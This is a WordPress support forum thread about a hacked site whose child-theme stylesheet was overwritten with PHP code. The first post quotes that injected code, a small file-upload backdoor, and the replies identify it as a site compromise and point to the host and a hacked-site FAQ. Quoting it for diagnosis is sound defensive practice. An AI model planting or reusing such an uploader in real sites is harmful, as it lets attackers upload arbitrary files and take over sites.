Child theme's style sheet keeps getting strange php inserted (5 posts)

  1. jennsweb
    Posted 2 years ago #


    I just updated a site that you can see here:


    The site was built with a child theme on the Suffusion theme.

    The problem is that twice over the past few days I have gone to the site and found all my custom styles removed and this code in place of them on the child theme's style sheet.

        $filedir = "";
        $maxfile = '2000000';
        $userfile_name = $_FILES['image']['name'];
        $userfile_tmp = $_FILES['image']['tmp_name'];
        if (isset($_FILES['image']['name'])) {
            $abod = $filedir.$userfile_name;
            @move_uploaded_file($userfile_tmp, $abod);
    echo"<center><b>Done ==> $userfile_name</b></center>";
    <form method="POST" action="" enctype="multipart/form-data"><input type="file" name="image"><input type="Submit" name="Submit" value="Submit"></form>';

    Here are the plugins we are using:

    Better WP Security
    Font Awesome 4 Menus
    Google Analytics Dashboard
    NextGEN Gallery
    NextGEN Galleryview
    Use Google Libraries
    WP Web APP Standard.

    What worked the other day was to simply copy the style sheet from my backup of the test site into the child theme's stylesheet. But it's so frustrating to see all my work get blown out of the water! Has anyone else had this happen while using a child theme of Suffusion?

  2. jennsweb
    Posted 2 years ago #

    I should note- I need to fix this ASAP for my client since it's a fairly well used site, but I would like to know how/why this keeps happening.

  3. DionDesigns
    Posted 2 years ago #


    Sorry, couldn't resist. ;) Anyway, the code you posted allows someone to upload files of any type to the site, which in effect allows that person to take over the site. If the rogue code returns after being deleted, your site may have been hacked.

    You should contact the hosting company immediately and provide them with the information you provided here.

  4. jennsweb
    Posted 2 years ago #

    Hi Dion,
    Well, with Salem you never know! ;}
    They have had repeated DOS attacks on their server last month before I started working on the new template and the hosting company is very cagey about what's going on. They host the site as a favor and I'm wondering if we should switch to a different hosting company. Uploads via FTP have been a nightmare. it cost me more in work hours than a reliable hosting provider charges in a year.

  5. bcworkz
    Posted 2 years ago #

    Whether you should change hosts is really a separate issue, though if they do not implement certain security in a shared hosting environment they could be part of the problem. Even though you notify your host as Dion suggests, you are in the best position to immediately protect your site and data from further damage.

    Malicious PHP code on a stylesheet shouldn't be an immediate threat, but someone unauthorized can clearly write to files at will. If that is the case, they do not need any malicious backdoor code, they have direct control of your site. That means you have been hacked. See FAQ My site was hacked for details on how to deal with this.

Topic Closed

This topic has been closed to new replies.

About this Topic